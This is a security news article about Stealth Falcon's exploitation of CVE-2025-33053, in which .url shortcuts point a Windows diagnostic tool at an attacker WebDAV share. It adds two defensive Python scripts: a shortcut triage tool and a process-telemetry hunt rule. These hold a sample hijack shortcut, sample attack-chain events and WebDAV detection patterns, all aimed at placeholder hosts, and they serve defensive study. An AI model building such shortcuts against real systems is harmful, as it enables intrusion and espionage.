Espionage in the Shadows: Stealth
In a chilling revelation that highlights the ongoing cybersecurity threats facing government and defense sectors, the hacking group known as Stealth Falcon, also referred to as FruityArmor, has been caught exploiting a previously unknown Windows vulnerability. This zero-day flaw, now identified as CVE-2025-33053, enables remote code execution (RCE) by making a legitimate Windows tool load a binary from an attacker-controlled WebDAV share. The campaign, which began in March 2025, targeted sensitive institutions across Turkey, Egypt, Yemen, and Qatar, with delivery methods designed to bypass traditional security layers and operate undetected.
Discovered by researchers at Check Point, the vulnerability hinges on how legitimate Windows executables resolve the helper programs they start. When a malicious internet shortcut (.url) file sets a WebDAV share as the working directory and launches a Windows tool such as iediagcmd.exe, the tool's bare-name calls to its helpers are resolved in that working directory before the genuine copies in the system directories, so code hosted on the attacker's server runs in place of the legitimate program. The initial payload is never written to the victim's disk by a conventional download, which sidesteps controls that key on file writes and leaves few local artifacts. Microsoft has released a patch, but the in-the-wild exploitation highlights an urgent need for rapid patch management and elevated monitoring, especially in sectors dealing with national security.
Stealthy Threats from Within: How Stealth Falcon Breached the Lines
A new cyberespionage wave has emerged, revealing how Stealth Falcon weaponized a zero-day Windows vulnerability to infiltrate high-value targets in the Middle East. The flaw, CVE-2025-33053, was exploited in a campaign beginning in March 2025. It yields remote code execution by abusing the order in which Windows resolves a program started by bare name: the process's working directory is searched before the system directories. The group sent phishing emails carrying .url files disguised as PDFs. Once opened, the shortcut launched iediagcmd.exe, a legitimate Internet Explorer diagnostic tool, with its working directory set to a directory on an attacker-controlled WebDAV server.
Instead of the genuine helper programs in the Windows system directory, iediagcmd.exe therefore ran lookalikes served from the attacker's share. One such file was a counterfeit route.exe, which acted as a malware loader named 'Horus Loader'. This loader deployed 'Horus Agent', an implant capable of system reconnaissance, command execution, shellcode injection, and file operations. The operation also included post-exploitation tools such as a credential dumper, a stealthy keylogger, and a passive network backdoor.
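A mail gateway or sandbox can catch this shape of shortcut before anyone double-clicks it. The script below is an added example, not Check Point's or Microsoft's code: it parses the [InternetShortcut] section of a .url file and flags the combination described above, a URL= entry that starts a local program together with a WorkingDirectory= entry on a remote share, calling out the WebDAV-only UNC forms (@SSL, @port, DavWWWRoot) separately. The two sample shortcuts, the placeholder host dav.example.invalid and the four-level severity scale are constructed for illustration and are not indicators from the campaign.

```python
"""Static triage of .url files for the working-directory hijack described
above.  Added example, not Check Point's or Microsoft's code; the sample
shortcuts are constructed and every host and path is a placeholder."""
import configparser
import re
from dataclasses import dataclass, field
from urllib.parse import unquote, urlparse

EXECUTABLE_EXT = (".exe", ".com", ".scr", ".cmd", ".bat", ".pif")
DOC_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")
SEVERITY = ["none", "low", "medium", "high"]
# UNC forms only the WebDAV Mini-Redirector understands:
#   \\host@80\share   \\host@SSL@443\share   \\host\DavWWWRoot\...
WEBDAV_HOST = re.compile(r"^\\\\[^\\]+@(?:SSL|\d{1,5})(?:@\d{1,5})?\\", re.I)
WEBDAV_ROOT = re.compile(r"\\DavWWWRoot(?:\\|$)", re.I)


def parse_url_file(text: str) -> dict[str, str]:
    """Return the [InternetShortcut] keys of a .url file, lower-cased."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return {k.lower(): v.strip().strip('"') for k, v in cp.items(section)}
    return {}


def is_remote(path: str) -> bool:
    return path.startswith("\\\\") or path.startswith("//")


def webdav_markers(path: str) -> list[str]:
    found = []
    if WEBDAV_HOST.search(path):
        found.append("@port/@SSL host suffix (WebDAV-only UNC syntax)")
    if WEBDAV_ROOT.search(path):
        found.append("DavWWWRoot path component (WebDAV-only UNC syntax)")
    return found


def url_target(url: str) -> str:
    """What URL= launches: a local or UNC path for file: URLs, else the URL."""
    parsed = urlparse(url)
    if parsed.scheme.lower() != "file":
        return url
    path = unquote(parsed.path).replace("/", "\\")
    if parsed.netloc:                   # file://host/share/x.exe -> \\host\share\x.exe
        return "\\\\" + parsed.netloc + path
    return path.lstrip("\\")            # file:///C:/dir/x.exe -> C:\dir\x.exe


@dataclass
class Finding:
    url: str = ""
    target: str = ""
    working_directory: str = ""
    severity: str = "none"
    reasons: list[str] = field(default_factory=list)

    def raise_to(self, level: str) -> None:
        if SEVERITY.index(level) > SEVERITY.index(self.severity):
            self.severity = level


def triage_url_file(text: str, filename: str = "") -> Finding:
    keys = parse_url_file(text)
    f = Finding(url=keys.get("url", ""), working_directory=keys.get("workingdirectory", ""))
    f.target = url_target(f.url) if f.url else ""
    runs_program = f.target.lower().endswith(EXECUTABLE_EXT)
    remote_cwd = bool(f.working_directory) and is_remote(f.working_directory)
    if runs_program:
        f.reasons.append(f"URL= starts a program rather than a web page: {f.target}")
        f.raise_to("high" if is_remote(f.target) else "medium")
    if remote_cwd:
        f.reasons.append(f"WorkingDirectory= is a remote share: {f.working_directory}")
        f.reasons.extend(webdav_markers(f.working_directory))
        f.raise_to("medium")
    if runs_program and remote_cwd:
        # The hijack itself: helpers the program starts by bare name are looked
        # up in the working directory before the system directories.
        f.reasons.append("working-directory hijack: helper binaries resolve on the remote share first")
        f.raise_to("high")
    if filename and filename.lower().removesuffix(".url").endswith(DOC_EXT):
        f.reasons.append(f"double extension disguises the shortcut as a document: {filename}")
        f.raise_to("low")
    return f


# Constructed samples; dav.example.invalid is a placeholder, not an indicator.
SAMPLE_HIJACK = r"""[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\dav.example.invalid@SSL@443\DavWWWRoot\share
IconFile=C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"""
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://docs.example.invalid/report.pdf
"""

if __name__ == "__main__":
    for name, body in (("report.pdf.url", SAMPLE_HIJACK), ("link.url", SAMPLE_BENIGN)):
        r = triage_url_file(body, name)
        print(name, r.severity, *("\n  - " + x for x in r.reasons))
```

A plain \\host\share working directory is reported as "remote" but without the WebDAV-only markers; Windows can still reach such a path over WebDAV through the WebClient service when SMB is unavailable, so the markers raise confidence rather than being required for the verdict.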
Stealth Falcon, active since 2012, has long focused on espionage in the Middle East. Previously known for using Apollo agents, the group now deploys Horus-based tools, a sign of increased sophistication and stealth. While no successful breaches were confirmed, Check Point stresses that the exploit was actively used and functional. Microsoft has since patched the flaw in its June 2025 Patch Tuesday update. Experts strongly advise immediate patching, or blocking outbound WebDAV traffic if patching isn't feasible. The case underscores the growing gap between exploitation and detection, especially when adversaries employ legitimate tools for illegitimate ends.
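The other half of that gap is detection on the endpoint. Below, as an added example rather than code from Check Point or Microsoft, is hunt logic a defender could run over process-creation telemetry (Sysmon Event ID 1 or equivalent EDR data): it keys on the WebDAV-only UNC syntax appearing in a process's Image or CurrentDirectory, and on the specific parent/child pair of iediagcmd.exe starting a binary on a remote share. The EVENTS list is constructed to place the two attack-chain records next to two benign ones; the host and share names are placeholders, and the rule names and severities are this example's own.

```python
"""Hunting the chain above in process-creation telemetry.  Added example,
not Check Point's or Microsoft's code.  EVENTS is a constructed list shaped
like Sysmon Event ID 1 (ProcessCreate) fields; hosts and shares are placeholders."""
import re

# UNC syntax only the WebDAV Mini-Redirector understands.  A plain \\host\share
# can also end up on WebDAV (the WebClient service is tried when SMB fails),
# but plain UNC paths are far too common in enterprises to alert on alone.
WEBDAV_SYNTAX = re.compile(
    r"^\\\\[^\\]+@(?:SSL|\d{1,5})(?:@\d{1,5})?\\|\\DavWWWRoot(?:\\|$)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_unc(path: str) -> bool:
    return path.startswith("\\\\")


def is_webdav(path: str) -> bool:
    return bool(WEBDAV_SYNTAX.search(path))


def detect(events: list[dict]) -> list[dict]:
    """Return one alert per (event, rule) match, in event order."""
    alerts = []
    for i, e in enumerate(events):
        image = e.get("Image", "")
        parent = e.get("ParentImage", "")
        cwd = e.get("CurrentDirectory", "")
        # A binary running straight off a WebDAV share is the payload stage.
        if is_webdav(image):
            alerts.append(dict(event=i, rule="image_on_webdav_share", severity="high",
                               detail=f"program started from a WebDAV share: {image}"))
        # A local program whose working directory is a WebDAV share is the
        # set-up stage: helpers it starts by bare name will be resolved there first.
        if is_webdav(cwd) and not is_unc(image):
            alerts.append(dict(event=i, rule="webdav_cwd", severity="medium",
                               detail=f"{basename(image)} started with working directory {cwd}"))
        # The specific parent/child relationship reported for this CVE.
        if basename(parent) == "iediagcmd.exe" and is_unc(image):
            alerts.append(dict(event=i, rule="iediagcmd_child_remote", severity="high",
                               detail=f"iediagcmd.exe resolved a helper on a remote share: {image}"))
        # Any other program run from a UNC path: worth a look, too noisy to page on.
        if is_unc(image) and not is_webdav(image):
            alerts.append(dict(event=i, rule="image_on_unc", severity="low",
                               detail=f"program started from a network share: {image}"))
    return alerts


def flagged_events(alerts: list[dict]) -> list[int]:
    return sorted({a["event"] for a in alerts})


EVENTS = [
    # 0. Shortcut opened: explorer starts the diagnostic tool with the
    #    shortcut's WorkingDirectory as its current directory.
    {"Image": r"C:\Program Files\Internet Explorer\iediagcmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CurrentDirectory": r"\\dav.example.invalid@SSL@443\DavWWWRoot\share",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iediagcmd.exe"'},
    # 1. The tool starts "route.exe" by bare name; Windows finds it on the share.
    {"Image": r"\\dav.example.invalid@SSL@443\DavWWWRoot\share\route.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iediagcmd.exe",
     "CurrentDirectory": r"\\dav.example.invalid@SSL@443\DavWWWRoot\share",
     "CommandLine": "route print"},
    # 2. Benign: the real route.exe run from a local prompt.
    {"Image": r"C:\Windows\System32\ROUTE.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CurrentDirectory": r"C:\Users\admin",
     "CommandLine": "route print"},
    # 3. Benign: a document opened from an ordinary SMB file share.
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CurrentDirectory": r"\\fileserver.corp.example\docs",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" report.docx'},
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"event {a['event']}: [{a['severity']}] {a['rule']}: {a['detail']}")
```

Event 3 is deliberately left unflagged: a working directory on a plain SMB share is everyday activity, and alerting on it would bury the two WebDAV records. Where an organisation has disabled the WebClient service, any hit on the WebDAV-only syntax is by itself anomalous.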
What Undercode Say:
The exploitation of CVE-2025-33053 by Stealth Falcon
From an attacker's perspective, using .url files to hijack the working directory of trusted executables is both clever and minimalistic. Because the abused tool starts its helpers through built-in functionality such as .NET's Process.Start(), which resolves a bare program name against the working directory before the system directories, the first stage runs from the attacker's share without the attacker ever writing a file to the victim's disk. That is the "fileless" property that lets it slip past endpoint detection and response (EDR) products keyed on file writes. The introduction of the Horus Loader and Horus Agent further highlights the modular design of modern malware. These tools are capable of dynamic execution and post-exploitation activity, showing that Stealth Falcon is advancing its toolset to stay ahead of security defenses.
Another disturbing aspect is the targeting of defense and governmental institutions. This isn’t just opportunistic hacking — it’s strategic espionage. The regional focus (Turkey, Yemen, Qatar, Egypt) aligns with geopolitical interests, suggesting that the attackers may be state-backed or at least state-aligned. While Check Point reports that the attempted attacks may not have succeeded, the capability and intent are both clearly present.
This incident also casts a spotlight on the lingering threat of WebDAV. Though it is an older technology, it remains in use and is often neglected in security protocols, and attackers leveraged it precisely because it is rarely monitored. On Windows endpoints, WebDAV access to UNC paths is provided by the WebClient service; where that service is not needed, disabling it removes this vector entirely, and where it is needed, outbound WebDAV connections deserve the same logging as SMB. Organizations need to reassess legacy protocols still running in their environments and segment or disable those that are no longer essential.
Finally, the delayed detection of this vulnerability until after it was weaponized reinforces a troubling truth: the defenders are still playing catch-up. Even with Microsoft’s patch now available, the gap between exploitation and patch deployment leaves a vulnerable window — especially for large or under-resourced organizations. Automated patching, behavior-based detection, and proactive threat intelligence sharing are more crucial than ever. This attack is a sobering example of how subtle, fileless techniques can outmaneuver traditional defenses, and a call to modernize security postures to meet the challenge.
Fact Checker Results ✅🛡️
✔️ The vulnerability CVE-2025-33053 is real and confirmed by Check Point and Microsoft
✔️ Stealth Falcon (aka FruityArmor) was actively exploiting this flaw in March 2025
✔️ Microsoft released a security patch addressing the issue in the June 2025 Patch Tuesday update
Prediction 🔮📊
As APT groups continue to prioritize stealth and precision, fileless attacks exploiting legitimate tools will become more common. Expect increased misuse of system processes and obscure protocols like WebDAV. Organizations that fail to monitor internal behaviors and legacy components may become prime targets for the next wave of nation-state espionage campaigns. Future exploits may go even deeper, blending into system processes so seamlessly that traditional antivirus and EDR will need a serious overhaul to keep up.
References:
Reported By: www.bleepingcomputer.com